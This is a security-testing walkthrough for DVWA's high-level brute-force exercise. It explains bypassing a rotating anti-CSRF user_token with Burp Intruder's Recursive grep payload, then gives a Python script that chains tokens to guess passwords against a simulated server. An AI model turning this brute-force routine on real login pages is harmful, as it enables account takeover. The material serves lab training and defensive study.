
Burp: brute-forcing a login protected by a random token value

November 13, 2019 • Read: 72 • Security testing

Environment: DVWA
Level: Brute Force, high


Code analysis

Looking at the code for the high level of Brute Force, a check on a random user_token has been added. Every login attempt must carry the token that the server handed out in the previous response, so a brute-force run has to obtain a valid user_token for each request rather than simply replaying one captured login.

// Anti-CSRF token check and credential sanitisation (DVWA brute/high.php, excerpt)
if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token: a missing or stale user_token redirects to index.php
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_GET[ 'username' ];
    // stripslashes() removes backslashes
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    // Password is compared as an MD5 hash
    $pass = md5( $pass );

    // ... rest of the handler (database lookup) omitted; generateSessionToken() then issues a fresh token for the next request
}

Getting to work

The login request carries a random user_token value, which defeats a naive brute force that replays a single captured request. [screenshot: login request with user_token parameter]

Burp Intruder's built-in extractor (Grep - Extract, used by the Recursive grep payload type) can pull the fresh token out of each response and feed it into the next request.
Note: when chaining a random token this way, the thread count must be 1. Each request depends on the token returned by the previous response, so requests cannot run in parallel.
[screenshot: Intruder resource pool / thread setting]

Define the extraction rule that captures the user_token value from the response body. [screenshot: Grep - Extract rule selecting the user_token value]

Set the payload for the user_token position to the extracted token (payload type Recursive grep). Note that an initial payload must be supplied for the first request, since there is no previous response to extract from. [screenshot: Recursive grep payload settings with initial payload]

The responses come back as 200 OK (a failed token check would instead redirect to index.php), so the brute force proceeds normally. [screenshot: Intruder results with 200 responses]
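For readers who prefer a script to Intruder, the following is the same token-chaining procedure written in Python. This is an added example, not code from the original post, DVWA or Burp: each response is parsed for the hidden user_token, the token is placed in the next login request, and the loop is strictly sequential, which is exactly why the Burp setup above needs a single thread. The `FakeDvwaHigh` class is a constructed stand-in that reproduces the token behaviour of the PHP snippet (token check, redirect on mismatch, fresh token after every checked attempt) so the script runs offline; the hostname, the success banner text and the default `admin` / `password` credentials are assumptions about the DVWA page, and `fetch` can be swapped for a real HTTP client.

```python
"""Scripted equivalent of Burp Intruder's Recursive grep payload against
DVWA Brute Force (high): harvest user_token from each response and use it
in the next request, one request at a time.

Added example, not DVWA's or Burp's own code. FakeDvwaHigh is a constructed
stand-in for brute/high.php; hostname, parameter names and the success
banner are assumptions about the DVWA page layout.
"""
import hashlib
import re
import secrets
from typing import Callable, Iterable, Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlparse

Fetch = Callable[[str], Tuple[int, str]]  # fetch(url) -> (HTTP status, body)

# The pattern a "Grep - Extract" rule would be configured to capture.
TOKEN_RE = re.compile(r"name=['\"]user_token['\"]\s+value=['\"]([0-9a-f]{32})['\"]")
SUCCESS_MARKER = "Welcome to the password protected area"  # assumed DVWA success text


def extract_token(html: str) -> Optional[str]:
    """Return the hidden user_token from a login page, or None if there is none."""
    match = TOKEN_RE.search(html)
    return match.group(1) if match else None


def build_login_url(base: str, username: str, password: str, token: str) -> str:
    """DVWA submits the login form as GET parameters, so the guess goes in the URL."""
    query = {"username": username, "password": password, "Login": "Login", "user_token": token}
    return f"{base}?{urlencode(query)}"


def brute_force(fetch: Fetch, base: str, username: str, candidates: Iterable[str]) -> Optional[str]:
    """Try each candidate password in order, chaining tokens between requests.

    Returns the working password or None. Request N+1 can only be built once
    response N has arrived, so this cannot be parallelised (Burp: 1 thread).
    """
    status, body = fetch(base)            # first request only harvests the initial token
    token = extract_token(body)
    for password in candidates:
        if token is None:
            raise RuntimeError("previous response carried no user_token; cannot continue")
        status, body = fetch(build_login_url(base, username, password, token))
        if status != 200:
            # checkToken() failed: server redirected to index.php instead of serving the form
            raise RuntimeError(f"token rejected for {password!r} (HTTP {status})")
        if SUCCESS_MARKER in body:
            return password
        token = extract_token(body)       # server rotated the token; pick up the new one
    return None


class FakeDvwaHigh:
    """Constructed stand-in for brute/high.php: session token, MD5 password, token rotation."""

    def __init__(self, username: str = "admin", password: str = "password") -> None:
        self.user = username
        self.pw_md5 = hashlib.md5(password.encode()).hexdigest()
        self.session_token = secrets.token_hex(16)

    def _form(self) -> str:
        return f"<form><input type='hidden' name='user_token' value='{self.session_token}' /></form>"

    def fetch(self, url: str) -> Tuple[int, str]:
        params = {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}
        if "Login" not in params:
            return 200, self._form()
        # checkToken(): wrong or missing token -> redirect to index.php, token left unchanged
        if params.get("user_token") != self.session_token:
            return 302, ""
        guess_md5 = hashlib.md5(params.get("password", "").encode()).hexdigest()
        ok = params.get("username") == self.user and guess_md5 == self.pw_md5
        # generateSessionToken(): every checked attempt gets a fresh token
        self.session_token = secrets.token_hex(16)
        body = f"<p>{SUCCESS_MARKER}</p>" if ok else "<pre>Username and/or password incorrect.</pre>"
        return 200, body + self._form()


if __name__ == "__main__":
    server = FakeDvwaHigh()
    found = brute_force(server.fetch, "http://dvwa.local/vulnerabilities/brute/", "admin",
                        ["123456", "letmein", "qwerty", "password"])
    print("password:", found)
```

Against the fake server the loop finds `password` on the fourth attempt. Replaying a token that has already been consumed gets a 302 instead of a 200, which is the failure you see in Intruder when the thread count is left above 1: two requests race for the same token and all but one are redirected.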
